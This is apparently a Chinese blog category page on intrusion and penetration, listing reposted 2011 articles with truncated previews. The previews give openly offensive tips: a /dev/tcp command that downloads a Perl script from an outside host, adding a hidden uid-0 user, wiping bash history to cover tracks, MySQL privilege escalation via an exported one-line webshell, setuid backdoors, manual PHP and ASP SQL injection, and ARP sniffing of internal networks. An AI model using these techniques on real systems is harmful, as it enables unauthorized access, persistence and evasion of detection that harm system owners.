
ccbz^入侵渗透
文章平均质量分 73
hkccbz
不是在沉默中爆发,就是在沉默中死亡
展开
-
linux渗透的小技巧
<br />老邪<br /><br />1.无wget nc等下载工具时下载文件<br />exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0/n" >&5 && cat<&5 > c.pl<br /><br />2.Linux添加uid为0的用户<br />useradd -o -u 0 cnbird<br /><br />3.bash去掉history记录<br />export HISTSIZE=0<br />export HIS转载 2011-01-21 13:39:00 · 554 阅读 · 0 评论 -
MYSQL提权技巧
转老邪问题对象:有虚拟主机空间商.网站服务器 过程:建立一个表→在表中输入我们的提权内容→出表→完成 1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器. 2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网站的.答案他们利用导出一句话木马. 3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件 4.虚拟主机提供商,自己给转载 2011-01-21 13:40:00 · 523 阅读 · 0 评论 -
linux留本地后门的方法
<br />看过程 方法一: setuid 方法。:<br />[root@localdomain lib]# ls -l |grep ld-linux<br />lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so<br />lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2<br />[root@localdomain lib]#转载 2011-01-24 09:31:00 · 569 阅读 · 0 评论 -
手工PHP注入详解
在这个注入风靡的时代,多少菜鸟拿着工具四处冲锋.如果你不想成为工具的奴隶,不想遇到PHP就退避三舍,不想继续做着ASP的菜鸟之群,不 想......那么请你静下心来, 随我一同走完这次的入侵检测全过程. <br /> 相信你必然能有所收获.不只在技术上,更在思路上,更在意识上..判断是否存在注入:首先,PHP和ASP判断注入的方法一样,在一个动态连接后面加上and 1=1,and 1=2看其返回结果即可判断.两次返回结果不相同,即可初步判断为有注入点. 判断字段大小:接下来,对付php猜字段的转载 2011-01-21 13:37:00 · 432 阅读 · 0 评论 -
脚本入侵讲解-asp注入漏洞
1:注入漏洞<br />------------<br />1.asp手工注入<br />第一步:<br />先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。<br />否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。<br />http://www.hack92.com/hack92.asp?id=1<br />我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏转载 2011-01-21 13:38:00 · 611 阅读 · 0 评论 -
ARP监听渗透内网的方法
<br />假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆<br />第一步:<br />tracert 61.139.1.1<br />C:/WIN2000/system32>tracert 61.139.1.1<br />Tracing route to HACK-4FJ7EARC [61.139.1.1]<br />over a maximum of 30 hops:<br />1 <10 ms <10 ms <10 ms转载 2011-01-23 01:09:00 · 407 阅读 · 0 评论